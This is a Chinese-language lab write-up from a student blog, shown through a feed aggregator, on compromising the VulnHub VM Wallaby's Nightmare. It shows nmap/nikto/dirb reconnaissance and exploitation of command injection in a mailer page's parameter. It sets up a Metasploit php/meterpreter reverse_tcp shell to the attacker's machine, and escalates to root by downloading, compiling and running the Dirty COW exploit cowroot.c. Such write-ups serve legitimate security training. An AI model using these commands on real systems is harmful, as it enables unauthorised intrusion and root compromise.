惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Cyberwarzone
Cyberwarzone
Recent Announcements
Recent Announcements
D
DataBreaches.Net
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园 - 聂微东
博客园 - 【当耐特】
aimingoo的专栏
aimingoo的专栏
N
Netflix TechBlog - Medium
V
Visual Studio Blog
The GitHub Blog
The GitHub Blog
Blog — PlanetScale
Blog — PlanetScale
Engineering at Meta
Engineering at Meta
L
LangChain Blog
The Cloudflare Blog
Y
Y Combinator Blog
AI
AI
P
Palo Alto Networks Blog
美团技术团队
有赞技术团队
有赞技术团队
I
Intezer
Last Week in AI
Last Week in AI
Know Your Adversary
Know Your Adversary
D
Darknet – Hacking Tools, Hacker News & Cyber Security
NISL@THU
NISL@THU
博客园 - 三生石上(FineUI控件)
MongoDB | Blog
MongoDB | Blog
S
Schneier on Security
IT之家
IT之家
博客园 - 司徒正美
A
Arctic Wolf
罗磊的独立博客
雷峰网
雷峰网
Vercel News
Vercel News
SecWiki News
SecWiki News
AWS News Blog
AWS News Blog
GbyAI
GbyAI
WordPress大学
WordPress大学
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
T
Tor Project blog
V
Vulnerabilities – Threatpost
Hugging Face - Blog
Hugging Face - Blog
H
Heimdal Security Blog
Schneier on Security
Schneier on Security
H
Help Net Security
T
Troy Hunt's Blog
N
News and Events Feed by Topic
爱范儿
爱范儿
V2EX - 技术
V2EX - 技术
Project Zero
Project Zero
T
The Exploit Database - CXSecurity.com

猫涅的秘密结社

关于就职的思考 hackthissite-org 数据库原理相关 关于在与我互动前你可能需要了解的事 信安roadmap 个人主页开发汇报 六级生词速记本——附考后感想 数据结构C++自学相关 NewStarCTF-2025 三款steam付费番茄钟软件测评 夏令营-ai hello-world qt环境下的c++程序编写 新新的年 qq机器人配置二三事 搞点java 读书笔记-当下的力量 网页小修时间 glibc更新记录 Vulhub在线靶场记录 Vulhub记录(旧的) 神奇脚本在哪里-CTF之Pwn BaseCTF高校联合新生赛2024 逆逆逆逆逆向-CTF之reverse 求解 夺旗时间 学学学 渗透测试相关 协议/漏洞/网络 最新的知识点 数据分析相关 zico2解析 OverTheWire-bandit解析 CTF实战相关2 靶机解析-gigachad ctf实战相关1 复习time 开学季 维修时间 小小修整 学校实训-笔记 每周靶机之Beelzebub 读书笔记-如何阅读一本书 DC-4解析 DC-2解析 每周靶机之ted 靶机-DC-1 每周靶机之bob potato解析 xss跨站点脚本攻击 每周靶机之Tommyboy1dot0 owasp命令执行漏洞 owasp文件包含漏洞 owasp上传漏洞 Hackademic.RTB1 owasp与sql注入与sqlmap liunx中sudo服务相关知识 liunx中ssh服务相关知识 moneybox解析 C语言相关1 关于加入aplayer的方式 再来一次 关于在next7.8.0中建设评论功能这件事 目前的进展 编辑小提示
每周靶机之WALLABY'S-NIGHTMARE
nirvana_felis · 2023-11-24 · via 猫涅的秘密结社

最近加入了学校的网安工作室 每周会给点作业 小项目需要写writeup
总之这是今天的靶机

环境配置

老样子 VMWARE 靶机 kali
ps: 请注意每个人的ip都会因为配置有细微的区别 请勿照抄代码
攻击机:kali(192.168.246.128)
靶机:WALLABY’S: NIGHTMARE (V1.0.2)(192.168.246.134)
靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/

发现靶机&访问网站

总之先arp-scan -l一下
1
发现靶机ip为192.168.246.134 使用nmap查看开放端口
nmap -p- 192.168.246.134 //快速扫描常用端口
2
结果显示开放了22 80端口
先上firefox查看 80端口对应的http服务
http://192.168.246.134
3
↑叫我输入个用户名 我这里就用我常用的网名了
4
↑点击超链接开始你的ctf之旅

解析过程

网站里有一只大眼睛 上面的英语大意是它发现了你要渗透这个服务器 正在观察你
5
我们先通过f12查看源码 发现没有什么隐藏的东西
于是使用web漏洞扫描工具nikto进行扫描
nikto -host 192.168.246.134
6
nikto表示这个网站存在漏洞 于是我们随它指示将这段链接复制到firefox替换网址后半段
输完之后 enter访问 发现 欸 怎么连接不上了
7
8
↑就算是通过history看之前大眼睛的网站也链接不上
再次通过nmap扫描 看看是不是80端口的问题
nmap -p- 192.168.246.134 //快速扫描常用端口
9
我们可以看到多出了个60080端口
让我们通过firefox访问该端口查看一下什么情况
http://192.168.246.134:60080/
10
英语大意是惊讶你追的很紧 幸好它完全转移到了一个不同的端口
这里我们可以猜到
之前在80端口时有个/?page页面 这里也多半会有 让我们试试看
11
果然对劲 我们再使用dirb工具对此页面进行目录扫描
dirb http://192.168.246.134:60080/?page=
12
结果里出现了一个后缀为mailer的网页
访问看看
13
看似什么都没有
但我们可以使用f12查看源码 发现有一段注释
14
这里
<a href='/?page=mailer&mail=mail wallaby "message goes here"'><button type='button'>Sendmail</button>
暴露了存在RCE(远程代码执行漏洞)

用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。——以上来自百度百科

于是我们验证一下
15
↑通过改变命令验证
漏洞已经出现
于是乎我们便可以通过多种方式来解决了
我用的是Metasploit

1
2
3
4
5
6
7
msfconsole
use exploit/multi/script/web\_delivery
set target 1
set payload php/meterpreter/reverse\_tcp
set lhost 192.168.246.128
set lport 8888
exploit

首先输入msfconsole进入msf控制台
16
↑设置msf参数,开启监听
将它所反馈出的命令复制在整个网址的mail=之后来启动整个监听程序
17
网站一直显示加载中则多半成功了 我们ctrl+c停止后输入sessions查看
出现了一个已获取的shell
我们输入sessions 1来链接shell
随后使用sysinfo命令查看靶机的系统信息
使用shell -t命令来获取系统shell
18

提权

总算来到了惊心动魄的提权环节
我们再开一个cmd窗口
输入
wget+https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
(格式所迫 只能这么写了)
python3 -m http.server 8081 //开启kali的http服务
19
回到刚才连接到靶机的cmd窗口
wget http://192.168.246.128:8081/cowroot.c //用靶机获取kali所分享的文件
gcc cowroot.c -o exp -pthread //对刚刚下载的提权脚本进行编译
20

1
2
chmod +x exp //给提权脚本赋予执行权限
./exp //运行提权脚本,运行后即可提权至root

这两句代码后 你就已经拥有了所有的权限
运用一些基础的linux语言便可获得flag

1
2
3
cd /root //将目录切换至root
ls //列出文件夹中的文件
cat flag.txt //查看flag.txt中的内容

21

好的那么我们下次见!